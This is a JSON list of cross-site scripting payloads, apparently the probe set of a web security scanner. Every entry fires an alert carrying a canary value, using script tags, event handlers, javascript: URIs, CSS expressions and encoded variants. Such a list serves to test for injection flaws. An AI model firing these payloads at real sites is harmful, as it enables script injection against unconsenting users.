[
"\"/><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
"a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
"<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
"<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
"/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
"/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
"/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
"//;-->alert(#{Cross::Attack::XSS::CANARY})",
"//;-->alert(#{Cross::Attack::XSS::CANARY});",
"\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
"\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
"<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
"<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
"<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
"<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
"<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
"<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
"<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
"<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
"<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
"<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
"</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
"<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
"<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
"<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
"<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
"<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
"<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
"<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
"<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
"<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
"<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
"<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
"<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
"<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
"<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
"<svg><script>//
alert(#{Cross::Attack::XSS::CANARY})</script>", "<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" ]